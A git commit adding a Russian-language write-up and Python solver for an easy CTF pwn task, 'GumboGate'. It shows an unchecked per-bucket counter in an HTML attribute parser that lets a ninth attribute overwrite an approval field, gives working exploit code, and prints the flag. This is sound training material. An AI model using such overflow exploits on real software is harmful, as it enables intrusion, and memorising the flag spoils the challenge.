Init. Commit
This commit is contained in:
@@ -0,0 +1,43 @@
|
||||
<h1 align="center">GumboGate</h1>
|
||||
|
||||
<p align="center">
|
||||
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
|
||||
<img src="https://img.shields.io/badge/difficulty-easy-brightgreen" alt="easy"/>
|
||||
</p>
|
||||
|
||||
На старте доступны сервис очистки HTML-накладных и бинарь `gumbogate`. Загружаем тег поставщика, затем запрашиваем отчёт. Сервис возвращает отчёт только после одобрения, а поле одобрения лежит сразу за массивом атрибутов.
|
||||
|
||||
## Решение
|
||||
|
||||
Смотрим структуру страницы в куче:
|
||||
|
||||
```c
|
||||
struct attr { char name[8]; char value[8]; };
|
||||
struct page {
|
||||
struct attr attrs[8];
|
||||
uint32_t approved;
|
||||
char report[64];
|
||||
};
|
||||
```
|
||||
|
||||
Для экспорта нужно `approved == 0x52505041`. В little-endian это четыре ASCII-байта `APPR`.
|
||||
|
||||
Парсер выбирает корзину по длине имени: `bucket = strlen(name) & 7`. Затем берёт `slot = used[bucket]++` и пишет в `attrs[slot]`. Верхнюю границу счётчика не проверяют, поэтому девятый атрибут одной корзины попадает в несуществующий `attrs[8]`.
|
||||
|
||||
Один атрибут занимает 16 байт, поэтому девятый начинается по смещению `8 × 16 = 128`, ровно на поле `approved`. Первые четыре байта его имени зададут значение этого поля.
|
||||
|
||||
Все имена делаем длиной восемь символов, чтобы они попали в корзину `0`:
|
||||
|
||||
```python
|
||||
attrs = [f"A{i:07d}=x" for i in range(8)]
|
||||
attrs.append("APPR0000=x")
|
||||
tag = "<" + " ".join(attrs) + ">"
|
||||
```
|
||||
|
||||
Восемь первых имён заполняют массив, `APPR0000` выходит за его границу и выставляет нужную константу. Отправляем тег в `1) ingest supplier tag`, затем выбираем `2) export cleaned report`. Проверка одобрения проходит, сервис отдаёт флаг.
|
||||
|
||||
[Солвер](solve/solve.py).
|
||||
|
||||
## Флаг
|
||||
|
||||
`caplag{attribute_bucket_walked_past_the_sanitizer}`
|
||||
@@ -0,0 +1,71 @@
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import os
|
||||
import socket
|
||||
import struct
|
||||
import subprocess
|
||||
import sys
|
||||
|
||||
class Tube:
|
||||
def __init__(self, sock=None, proc=None):
|
||||
self.sock = sock
|
||||
self.proc = proc
|
||||
def recv(self, n=4096):
|
||||
if self.sock:
|
||||
return self.sock.recv(n)
|
||||
return os.read(self.proc.stdout.fileno(), n)
|
||||
def send(self, data):
|
||||
if self.sock:
|
||||
self.sock.sendall(data)
|
||||
else:
|
||||
os.write(self.proc.stdin.fileno(), data)
|
||||
def sendline(self, data):
|
||||
self.send(data + b"\n")
|
||||
def recvuntil(self, marker):
|
||||
out = b""
|
||||
while marker not in out:
|
||||
chunk = self.recv(1)
|
||||
if not chunk:
|
||||
raise EOFError(out)
|
||||
out += chunk
|
||||
return out
|
||||
|
||||
def symbol_value(binary, name):
|
||||
out = subprocess.check_output(["readelf", "-sW", binary], text=True)
|
||||
for line in out.splitlines():
|
||||
fields = line.split()
|
||||
if len(fields) >= 8 and fields[-1] == name:
|
||||
return int(fields[1], 16)
|
||||
raise RuntimeError(f"symbol not found: {name}")
|
||||
|
||||
def connect(args):
|
||||
if args.local:
|
||||
env = os.environ.copy()
|
||||
env["CTF_FLAG"] = args.flag
|
||||
proc = subprocess.Popen([args.binary], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
|
||||
return Tube(proc=proc)
|
||||
return Tube(sock=socket.create_connection((args.host, args.port), timeout=5))
|
||||
|
||||
def choose(io, value):
|
||||
io.recvuntil(b">")
|
||||
io.sendline(str(value).encode())
|
||||
|
||||
def main():
|
||||
p = argparse.ArgumentParser()
|
||||
p.add_argument("--host", default="127.0.0.1")
|
||||
p.add_argument("--port", type=int, default=31341)
|
||||
p.add_argument("--local", action="store_true")
|
||||
p.add_argument("--binary", default="../public/gumbogate")
|
||||
p.add_argument("--flag", default="caplag{attribute_bucket_walked_past_the_sanitizer}")
|
||||
args = p.parse_args()
|
||||
io = connect(args)
|
||||
names = [f"A{i:07d}".encode() for i in range(8)] + [b"APPR0000"]
|
||||
tag = b"<" + b" ".join(n + b"=x" for n in names) + b">"
|
||||
choose(io, 1)
|
||||
io.recvuntil(b"tag:")
|
||||
io.sendline(tag)
|
||||
choose(io, 2)
|
||||
data = io.recvuntil(b"}")
|
||||
print(data[data.rfind(b"caplag{"):].decode())
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
Reference in New Issue
Block a user